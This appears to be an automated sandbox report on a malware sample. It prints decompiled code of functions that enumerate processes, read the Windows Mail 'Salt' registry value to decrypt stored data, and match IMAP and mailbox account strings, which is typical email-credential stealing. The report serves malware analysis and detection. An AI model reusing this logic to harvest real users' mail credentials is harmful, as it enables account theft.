                                                                                                                                                                        0x0040e7a2
                                                                                                                                                                        0x0040e7aa
                                                                                                                                                                        0x0040e7ae
                                                                                                                                                                        0x0040e7b3
                                                                                                                                                                        0x0040e7bb
                                                                                                                                                                        0x0040e7bf
                                                                                                                                                                        0x0040e7c4
                                                                                                                                                                        0x0040e7c6
                                                                                                                                                                        0x0040e7c6
                                                                                                                                                                        0x0040e7c4
                                                                                                                                                                        0x0040e7b3
                                                                                                                                                                        0x0040e7a2
                                                                                                                                                                        0x0040e791
                                                                                                                                                                        0x0040e7d8
                                                                                                                                                                        0x0040e7db
                                                                                                                                                                        0x0040e7db
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e7d8

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,0040E370), ref: 0040E75E
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E777
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E788
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E799
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E7AA
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E7BB
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0040E7DB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                        • API String ID: 2449869053-232097475
                                                                                                                                                                        • Opcode ID: 84e491b4529d3412f2215207142cb03e9d322bcacbabb572ff9b82cad9202ccb
                                                                                                                                                                        • Instruction ID: 4da247ea616dd2a72ab7006308dc9c89d3535959c96c16615461c58e29f3e28a
                                                                                                                                                                        • Opcode Fuzzy Hash: 84e491b4529d3412f2215207142cb03e9d322bcacbabb572ff9b82cad9202ccb
                                                                                                                                                                        • Instruction Fuzzy Hash: B8012530645211AAC711DB266C81FA73DF99B85B80F15843FF400F2694DB7CC5529A6C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00410BCE Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136stringregistryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                        			E00410BCE(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v6;
				char _v7;
				char _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				short* _v24;
				unsigned int _v28;
				char* _v32;
				int _v36;
				intOrPtr _v40;
				signed int _v44;
				void _v299;
				char _v300;
				void _v555;
				char _v556;
				char _v1080;
				void* __esi;
				int _t56;
				intOrPtr _t58;
				intOrPtr _t64;
				char _t92;
				char* _t93;
				void* _t100;
				signed int _t102;
				signed int _t107;
				intOrPtr _t108;
				void* _t113;

				_t113 = __eflags;
				_t100 = __edx;
				_t93 = __eax;
				E004046E1( &_v1080);
				if(E004047AA( &_v1080, _t113) != 0) {
					_t56 = strlen(_t93);
					asm("cdq");
					_t107 = _t56 - _t100 >> 1;
					_t2 = _t107 + 1; // 0x1
					_t58 = _t2;
					L00412090();
					_t102 = 0;
					_t96 = _t58;
					_v16 = _t58;
					if(_t107 > 0) {
						do {
							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
							_v7 = _t93[1 + _t102 * 2];
							_v6 = 0;
							_t92 = E00406541( &_v8);
							_t96 = _v16;
							 *((char*)(_t102 + _v16)) = _t92;
							_t102 = _t102 + 1;
						} while (_t102 < _t107);
					}
					_v556 = 0;
					memset( &_v555, 0, 0xff);
					_v12 = 0;
					_v300 = 0;
					memset( &_v299, 0, 0xfe);
					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
					if(_t64 != 1) {
						__eflags = _t64 - 2;
						if(_t64 == 2) {
							_push("Software\\Microsoft\\Windows Live Mail");
							goto L7;
						}
					} else {
						_push("Software\\Microsoft\\Windows Mail");
						L7:
						strcpy( &_v300, ??);
						_pop(_t96);
					}
					if(E0040F1B0(0x80000001,  &_v300,  &_v20) == 0) {
						_v12 = 0xff;
						E0040F214(_t96, _v20, "Salt",  &_v556,  &_v12);
						RegCloseKey(_v20);
					}
					_v40 = _v16;
					_v36 = _v12;
					_v32 =  &_v556;
					_v44 = _t107;
					if(E0040481B( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
						_t108 = _a8;
						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
						(_t108 + 0x400)[_v28 >> 1] = 0;
						LocalFree(_v24);
					}
					_push(_v16);
					L00412096();
				}
				return E004047FB( &_v1080);
			}































                                                                                                                                                                        0x00410bce
                                                                                                                                                                        0x00410bce
                                                                                                                                                                        0x00410bdf
                                                                                                                                                                        0x00410be1
                                                                                                                                                                        0x00410bed
                                                                                                                                                                        0x00410bf5
                                                                                                                                                                        0x00410bfa
                                                                                                                                                                        0x00410bff
                                                                                                                                                                        0x00410c01
                                                                                                                                                                        0x00410c01
                                                                                                                                                                        0x00410c05
                                                                                                                                                                        0x00410c0b
                                                                                                                                                                        0x00410c0f
                                                                                                                                                                        0x00410c10
                                                                                                                                                                        0x00410c13
                                                                                                                                                                        0x00410c15
                                                                                                                                                                        0x00410c18
                                                                                                                                                                        0x00410c1f
                                                                                                                                                                        0x00410c26
                                                                                                                                                                        0x00410c2a
                                                                                                                                                                        0x00410c30
                                                                                                                                                                        0x00410c33
                                                                                                                                                                        0x00410c36
                                                                                                                                                                        0x00410c37
                                                                                                                                                                        0x00410c15
                                                                                                                                                                        0x00410c4a
                                                                                                                                                                        0x00410c51
                                                                                                                                                                        0x00410c65
                                                                                                                                                                        0x00410c68
                                                                                                                                                                        0x00410c6e
                                                                                                                                                                        0x00410c76
                                                                                                                                                                        0x00410c82
                                                                                                                                                                        0x00410c8b
                                                                                                                                                                        0x00410c8e
                                                                                                                                                                        0x00410c90
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410c90
                                                                                                                                                                        0x00410c84
                                                                                                                                                                        0x00410c84
                                                                                                                                                                        0x00410c95
                                                                                                                                                                        0x00410c9c
                                                                                                                                                                        0x00410ca2
                                                                                                                                                                        0x00410ca2
                                                                                                                                                                        0x00410cbd
                                                                                                                                                                        0x00410cd2
                                                                                                                                                                        0x00410cd5
                                                                                                                                                                        0x00410ce0
                                                                                                                                                                        0x00410ce0
                                                                                                                                                                        0x00410ce9
                                                                                                                                                                        0x00410cef
                                                                                                                                                                        0x00410cf8
                                                                                                                                                                        0x00410d0d
                                                                                                                                                                        0x00410d17
                                                                                                                                                                        0x00410d19
                                                                                                                                                                        0x00410d31
                                                                                                                                                                        0x00410d3c
                                                                                                                                                                        0x00410d46
                                                                                                                                                                        0x00410d46
                                                                                                                                                                        0x00410d4c
                                                                                                                                                                        0x00410d4f
                                                                                                                                                                        0x00410d55
                                                                                                                                                                        0x00410d64

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                          • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
                                                                                                                                                                          • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                        • strlen.MSVCRT ref: 00410BF5
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00410C05
                                                                                                                                                                        • memset.MSVCRT ref: 00410C51
                                                                                                                                                                        • memset.MSVCRT ref: 00410C6E
                                                                                                                                                                        • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00410C9C
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00410CE0
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410D31
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00410D46
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00410D4F
                                                                                                                                                                          • Part of subcall function 00406541: strtoul.MSVCRT ref: 00406549
                                                                                                                                                                        Strings
                                                                                                                                                                        • Salt, xrefs: 00410CCA
                                                                                                                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 00410C90
                                                                                                                                                                        • Software\Microsoft\Windows Mail, xrefs: 00410C84
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                        • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                        • API String ID: 1673043434-2687544566
                                                                                                                                                                        • Opcode ID: 342b62813bf58c369db31d81dd449ebf5665bdc31e2008f4eea2573a64a7df1c
                                                                                                                                                                        • Instruction ID: 35ff079a9a2d20c7a5c67e942e04d515760747927ccc6212efb4229f933df569
                                                                                                                                                                        • Opcode Fuzzy Hash: 342b62813bf58c369db31d81dd449ebf5665bdc31e2008f4eea2573a64a7df1c
                                                                                                                                                                        • Instruction Fuzzy Hash: 94419876D0021DAECB11DBA5DC41ADEBBBCAF48304F0441ABEA45F3241DA74DB85CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040CD82 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E0040CD82(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t37;
				void* _t53;
				char* _t54;
				intOrPtr _t60;
				void* _t61;
				char* _t62;
				void* _t67;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t87;
				void* _t88;
				void* _t89;

				_t87 = _a4;
				_t84 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
					_t37 = 0;
				} else {
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t37);
				L004120D2();
				_t89 = _t88 + 0xc;
				if(_t37 == 0) {
					L8:
					_a4 = 0;
					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
						while(1) {
							_t85 = E0040DA96(_a4, _t84 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t85 + 0x104; // 0x104
							_t18 = _t85 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t85 + 0x104; // 0x104
							_t21 = _t85 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t53 = 0;
							_t89 = _t89 + 0x38;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t53);
							_t54 =  &_v620;
							_push(_t54);
							L00412072();
							if(_t54 == 0) {
								goto L17;
							}
							_t61 = 0;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t61);
							_t62 =  &_v1232;
							_push(_t62);
							L00412072();
							if(_t62 != 0) {
								L18:
								_a4 = _a4 + 1;
								_t60 = _v8;
								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
									_t84 = _t60;
									continue;
								} else {
								}
							} else {
								goto L17;
							}
							goto L21;
							L17:
							if( *((char*)(E00406B3E( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
								E0040132A(_t57 + 1, _t85 + 0x304, 0xff);
							} else {
								goto L18;
							}
							goto L21;
						}
					}
				} else {
					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
						_t67 = 0;
					} else {
						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t67);
					L004120D2();
					_t89 = _t89 + 0xc;
					if(_t67 == 0) {
						goto L8;
					}
				}
				L21:
				return 1;
			}





















                                                                                                                                                                        0x0040cd8d
                                                                                                                                                                        0x0040cd96
                                                                                                                                                                        0x0040cd98
                                                                                                                                                                        0x0040cd9b
                                                                                                                                                                        0x0040cda7
                                                                                                                                                                        0x0040cd9d
                                                                                                                                                                        0x0040cda2
                                                                                                                                                                        0x0040cda2
                                                                                                                                                                        0x0040cda9
                                                                                                                                                                        0x0040cdab
                                                                                                                                                                        0x0040cdb0
                                                                                                                                                                        0x0040cdb1
                                                                                                                                                                        0x0040cdb6
                                                                                                                                                                        0x0040cdbb
                                                                                                                                                                        0x0040cde6
                                                                                                                                                                        0x0040cdec
                                                                                                                                                                        0x0040cdef
                                                                                                                                                                        0x0040cdfe
                                                                                                                                                                        0x0040ce0d
                                                                                                                                                                        0x0040ce18
                                                                                                                                                                        0x0040ce1f
                                                                                                                                                                        0x0040ce2e
                                                                                                                                                                        0x0040ce35
                                                                                                                                                                        0x0040ce3a
                                                                                                                                                                        0x0040ce41
                                                                                                                                                                        0x0040ce54
                                                                                                                                                                        0x0040ce59
                                                                                                                                                                        0x0040ce60
                                                                                                                                                                        0x0040ce73
                                                                                                                                                                        0x0040ce78
                                                                                                                                                                        0x0040ce7a
                                                                                                                                                                        0x0040ce80
                                                                                                                                                                        0x0040ce87
                                                                                                                                                                        0x0040ce87
                                                                                                                                                                        0x0040ce8a
                                                                                                                                                                        0x0040ce8b
                                                                                                                                                                        0x0040ce91
                                                                                                                                                                        0x0040ce92
                                                                                                                                                                        0x0040ce9b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ce9d
                                                                                                                                                                        0x0040cea2
                                                                                                                                                                        0x0040cea9
                                                                                                                                                                        0x0040cea9
                                                                                                                                                                        0x0040ceac
                                                                                                                                                                        0x0040cead
                                                                                                                                                                        0x0040ceb3
                                                                                                                                                                        0x0040ceb4
                                                                                                                                                                        0x0040cebd
                                                                                                                                                                        0x0040cecf
                                                                                                                                                                        0x0040cecf
                                                                                                                                                                        0x0040ced2
                                                                                                                                                                        0x0040cede
                                                                                                                                                                        0x0040cdfc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cee4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cebf
                                                                                                                                                                        0x0040cecd
                                                                                                                                                                        0x0040cef2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cecd
                                                                                                                                                                        0x0040cdfe
                                                                                                                                                                        0x0040cdbd
                                                                                                                                                                        0x0040cdc0
                                                                                                                                                                        0x0040cdcc
                                                                                                                                                                        0x0040cdc2
                                                                                                                                                                        0x0040cdc7
                                                                                                                                                                        0x0040cdc7
                                                                                                                                                                        0x0040cdce
                                                                                                                                                                        0x0040cdd0
                                                                                                                                                                        0x0040cdd5
                                                                                                                                                                        0x0040cdd6
                                                                                                                                                                        0x0040cddb
                                                                                                                                                                        0x0040cde0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cde0
                                                                                                                                                                        0x0040cef9
                                                                                                                                                                        0x0040ceff

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                                                                                                                                                                        • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                        • API String ID: 4281260487-2229823034
                                                                                                                                                                        • Opcode ID: 024d07740614e5bd8b0db970560de94806a9e64d99aa777f67af906b6590f4e6
                                                                                                                                                                        • Instruction ID: 2d12b684a12309e3f166330e45fd276d2d431d1b057f0c9926c0b37ed6681b29
                                                                                                                                                                        • Opcode Fuzzy Hash: 024d07740614e5bd8b0db970560de94806a9e64d99aa777f67af906b6590f4e6
                                                                                                                                                                        • Instruction Fuzzy Hash: BE41B172604205DFD724DBA4C9C1F97B7E8AF08304F10467BE649E3281D778E955CB58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040CD80 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 122COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E0040CD80(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t39;
				void* _t55;
				char* _t56;
				intOrPtr _t62;
				void* _t63;
				char* _t64;
				void* _t69;
				intOrPtr _t89;
				void* _t91;
				intOrPtr _t94;
				void* _t99;
				void* _t100;
				void* _t101;

				_t100 = _t99 - 0x4cc;
				_t94 = _a4;
				_t89 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
					_t39 = 0;
				} else {
					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t39);
				L004120D2();
				_t101 = _t100 + 0xc;
				if(_t39 == 0) {
					L9:
					_a4 = 0;
					if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
						while(1) {
							_t91 = E0040DA96(_a4, _t89 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t91 + 0x104; // 0x104
							_t18 = _t91 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t91 + 0x104; // 0x104
							_t21 = _t91 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t55 = 0;
							_t101 = _t101 + 0x38;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t55);
							_t56 =  &_v620;
							_push(_t56);
							L00412072();
							if(_t56 == 0) {
								goto L18;
							}
							_t63 = 0;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t63);
							_t64 =  &_v1232;
							_push(_t64);
							L00412072();
							if(_t64 != 0) {
								L19:
								_a4 = _a4 + 1;
								_t62 = _v8;
								if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
									_t89 = _t62;
									continue;
								} else {
								}
							} else {
								goto L18;
							}
							goto L22;
							L18:
							if( *((char*)(E00406B3E( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
								E0040132A(_t59 + 1, _t91 + 0x304, 0xff);
							} else {
								goto L19;
							}
							goto L22;
						}
					}
				} else {
					if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
						_t69 = 0;
					} else {
						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t69);
					L004120D2();
					_t101 = _t101 + 0xc;
					if(_t69 == 0) {
						goto L9;
					}
				}
				L22:
				return 1;
			}






















                                                                                                                                                                        0x0040cd85
                                                                                                                                                                        0x0040cd8d
                                                                                                                                                                        0x0040cd96
                                                                                                                                                                        0x0040cd98
                                                                                                                                                                        0x0040cd9b
                                                                                                                                                                        0x0040cda7
                                                                                                                                                                        0x0040cd9d
                                                                                                                                                                        0x0040cda2
                                                                                                                                                                        0x0040cda2
                                                                                                                                                                        0x0040cda9
                                                                                                                                                                        0x0040cdab
                                                                                                                                                                        0x0040cdb0
                                                                                                                                                                        0x0040cdb1
                                                                                                                                                                        0x0040cdb6
                                                                                                                                                                        0x0040cdbb
                                                                                                                                                                        0x0040cde6
                                                                                                                                                                        0x0040cdec
                                                                                                                                                                        0x0040cdef
                                                                                                                                                                        0x0040cdfe
                                                                                                                                                                        0x0040ce0d
                                                                                                                                                                        0x0040ce18
                                                                                                                                                                        0x0040ce1f
                                                                                                                                                                        0x0040ce2e
                                                                                                                                                                        0x0040ce35
                                                                                                                                                                        0x0040ce3a
                                                                                                                                                                        0x0040ce41
                                                                                                                                                                        0x0040ce54
                                                                                                                                                                        0x0040ce59
                                                                                                                                                                        0x0040ce60
                                                                                                                                                                        0x0040ce73
                                                                                                                                                                        0x0040ce78
                                                                                                                                                                        0x0040ce7a
                                                                                                                                                                        0x0040ce80
                                                                                                                                                                        0x0040ce87
                                                                                                                                                                        0x0040ce87
                                                                                                                                                                        0x0040ce8a
                                                                                                                                                                        0x0040ce8b
                                                                                                                                                                        0x0040ce91
                                                                                                                                                                        0x0040ce92
                                                                                                                                                                        0x0040ce9b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ce9d
                                                                                                                                                                        0x0040cea2
                                                                                                                                                                        0x0040cea9
                                                                                                                                                                        0x0040cea9
                                                                                                                                                                        0x0040ceac
                                                                                                                                                                        0x0040cead
                                                                                                                                                                        0x0040ceb3
                                                                                                                                                                        0x0040ceb4
                                                                                                                                                                        0x0040cebd
                                                                                                                                                                        0x0040cecf
                                                                                                                                                                        0x0040cecf
                                                                                                                                                                        0x0040ced2
                                                                                                                                                                        0x0040cede
                                                                                                                                                                        0x0040cdfc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cee4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cebf
                                                                                                                                                                        0x0040cecd
                                                                                                                                                                        0x0040cef2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cecd
                                                                                                                                                                        0x0040cdfe
                                                                                                                                                                        0x0040cdbd
                                                                                                                                                                        0x0040cdc0
                                                                                                                                                                        0x0040cdcc
                                                                                                                                                                        0x0040cdc2
                                                                                                                                                                        0x0040cdc7
                                                                                                                                                                        0x0040cdc7
                                                                                                                                                                        0x0040cdce
                                                                                                                                                                        0x0040cdd0
                                                                                                                                                                        0x0040cdd5
                                                                                                                                                                        0x0040cdd6
                                                                                                                                                                        0x0040cddb
                                                                                                                                                                        0x0040cde0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cde0
                                                                                                                                                                        0x0040cef8
                                                                                                                                                                        0x0040ceff

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _stricmp_strnicmpmemsetsprintf
                                                                                                                                                                        • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                        • API String ID: 2822975062-2229823034
                                                                                                                                                                        • Opcode ID: 0f1e78ed6c62de82fcf3c07d446e549c31a630c2920e6e4e59f58844e705f72b
                                                                                                                                                                        • Instruction ID: b4ee7e9bcea435462912fc28dba82f8fd87397000d83f7605d7513f68c800710
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f1e78ed6c62de82fcf3c07d446e549c31a630c2920e6e4e59f58844e705f72b
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C417E72604205EFD724DBA4C9C1F96B7E8AF18304F00467BE64AE3281D778F995CB98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040820D Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 56%
                                                                                                                                                                        			E0040820D(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				char _t30;
				struct HMENU__* _t32;
				char _t39;
				void* _t42;
				struct HWND__* _t43;
				struct HMENU__* _t48;

				_t42 = __edi;
				_t38 = __ecx;
				E00412360(0x1004, __ecx);
				_t55 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t39 =  *0x418488;
						__eflags = _t39;
						if(_t39 == 0) {
							L8:
							_push(_t42);
							sprintf(0x4182c0, "dialog_%d", _a12);
							_t43 = CreateDialogParamA(_a4, _a12, 0, E00408208, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t43,  &_v4104, 0x1000);
							__eflags = _v4104;
							if(__eflags != 0) {
								E00407FBF(__eflags, "caption",  &_v4104);
							}
							EnumChildWindows(_t43, E00408155, 0);
							DestroyWindow(_t43);
						} else {
							while(1) {
								_t30 =  *_t39;
								__eflags = _t30;
								if(_t30 == 0) {
									goto L8;
								}
								__eflags = _t30 - _a12;
								if(_t30 != _a12) {
									_t39 = _t39 + 4;
									__eflags = _t39;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					sprintf(0x4182c0, "menu_%d", _a12);
					_t32 = LoadMenuA(_a4, _a12);
					 *0x4181b4 =  *0x4181b4 & 0x00000000;
					_t48 = _t32;
					_push(1);
					_push(_t48);
					_push(_a12);
					E00408065(_t38, _t55);
					DestroyMenu(_t48);
				}
				return 1;
			}











                                                                                                                                                                        0x0040820d
                                                                                                                                                                        0x0040820d
                                                                                                                                                                        0x00408215
                                                                                                                                                                        0x0040821a
                                                                                                                                                                        0x0040821f
                                                                                                                                                                        0x00408265
                                                                                                                                                                        0x00408269
                                                                                                                                                                        0x0040826f
                                                                                                                                                                        0x00408278
                                                                                                                                                                        0x0040827a
                                                                                                                                                                        0x00408290
                                                                                                                                                                        0x00408290
                                                                                                                                                                        0x0040829e
                                                                                                                                                                        0x004082bf
                                                                                                                                                                        0x004082c9
                                                                                                                                                                        0x004082cf
                                                                                                                                                                        0x004082e0
                                                                                                                                                                        0x004082e6
                                                                                                                                                                        0x004082ec
                                                                                                                                                                        0x004082fa
                                                                                                                                                                        0x00408300
                                                                                                                                                                        0x00408308
                                                                                                                                                                        0x0040830f
                                                                                                                                                                        0x0040827c
                                                                                                                                                                        0x0040828a
                                                                                                                                                                        0x0040828a
                                                                                                                                                                        0x0040828c
                                                                                                                                                                        0x0040828e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040827e
                                                                                                                                                                        0x00408281
                                                                                                                                                                        0x00408287
                                                                                                                                                                        0x00408287
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408287
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408281
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040828a
                                                                                                                                                                        0x00408316
                                                                                                                                                                        0x00408316
                                                                                                                                                                        0x00408221
                                                                                                                                                                        0x0040822e
                                                                                                                                                                        0x0040823c
